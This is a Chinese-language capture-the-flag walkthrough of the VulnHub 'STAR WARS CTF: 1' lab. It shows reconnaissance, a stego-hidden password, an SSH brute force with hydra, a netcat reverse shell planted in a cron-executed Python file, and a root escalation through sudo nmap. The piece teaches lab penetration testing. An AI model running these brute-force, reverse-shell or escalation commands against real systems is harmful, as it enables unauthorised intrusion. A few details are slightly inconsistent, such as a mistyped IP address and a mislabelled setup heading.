VulnHub渗透测试实战靶场 - STAR WARS CTF: 1

Posted H3rmesk1t

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了VulnHub渗透测试实战靶场 - STAR WARS CTF: 1相关的知识,希望对你有一定的参考价值。

题目描述

Star Wars themed CTF for beginners

This works better with VirtualBox rather than VMware

环境下载

NULLY CYBERSECURITY: 1靶机搭建

  1. 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
  2. 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only
  • 目标靶机的 IP 地址为:192.168.56.111
  • 攻击机的 IP 地址为:192.168.56.102

渗透测试

信息搜集

用 Nmap 扫描一下目标靶机的端口信息:sudo nmap -sS -A -Pn 192.168.56.111,发现开放了 22、80 两个端口

用 dirb 扫描一下 80 端口 web 目录:dirb http://192.168.56.111

漏洞挖掘

  • 访问 http://192.168.56.111/robots.txt,提示
Why does the Jedi Order keep checking the robots.txt file.
Might take a look at /r2d2
He is the real OG. 
  • 根据提示访问 http://192.168.56.111/r2d2
  • 查看 http://192.168.56.111/index.html 源代码,发现注释中有串 base64 字符串注明是密码,解密后出现了滑稽的一幕,先记录一下等会试试有没有用
  • 注意到前面的页面中存在两张照片,访问 http://192.168.56.111/images/,正好是这两张照片,下载下来分析时发现 png 图片有异常的数据,用 zsteg 查看一下发现真正的密码:babyYoda123
  • 但是不知道用户名是啥,继续用 dirb 探测一下 dirb http://192.268.56.111 -X .php,.js,.txt,发现存在 http://192.168.56.111/users.js,访问得到两个用户名 skywalker、han

getshell

  • 由于开放了 22 端口,用得到的用户名和密码组合尝试登录 ssh,发现 skywalker:han 可以组合成功

提权

  • 查看文件发现 han 家目录下有一个文件夹 .secrets,内有一个 note.txt,查看内容
  • 根据 note.txt 的内容,利用 cewlhttp://192.168.56.111/r2d2 进行信息收集制作密码集
cewl http://192.168.56.111/r2d2 > pass.txt
  • 继续用 hydra 爆破 skywalker 的密码,得到密码: tatooine
hydra -l skywalker -P pass.txt -f -V 192.168.56.111 ssh
  • 切换用户到 skywalker,继续重复前面的操作,发现内容
  • 查看用户 Darth 家目录下的内容,同样发现家目录下有一个文件夹 .secrets,内有一个 eval.py,其是一个可读写的可执行 python 文件,这个文件在一分钟后执行,我们修改其内容为
import os 
os.system("nc -e /bin/bash 192.168.56.102 1234")
  • 起个 nc,等待片刻,成功接收到反弹的 shell,先将 shell 转变成交互式的 shell
SHELL=/bin/bash script -q /dev/null
  • 执行 sudo -l 查看,发现可以通过 /usr/bin/nmap 来提权,成功拿到 root 权限
echo "os.execute('/bin/sh')" > /tmp/root.nse
sudo /usr/bin/nmap --script=/tmp/root.nse

以上是关于VulnHub渗透测试实战靶场 - STAR WARS CTF: 1的主要内容,如果未能解决你的问题,请参考以下文章

VulnHub渗透测试实战靶场 - Funbox: Lunchbreaker

VulnHub渗透测试实战靶场 - NULLY CYBERSECURITY: 1

VulnHub渗透测试实战靶场-HA: FORENSICS

VulnHub渗透测试实战靶场 - FUNBOX: CTF

VulnHub渗透测试实战靶场 - Funbox: GaoKao

VulnHub渗透测试实战靶场 - DevContainer:1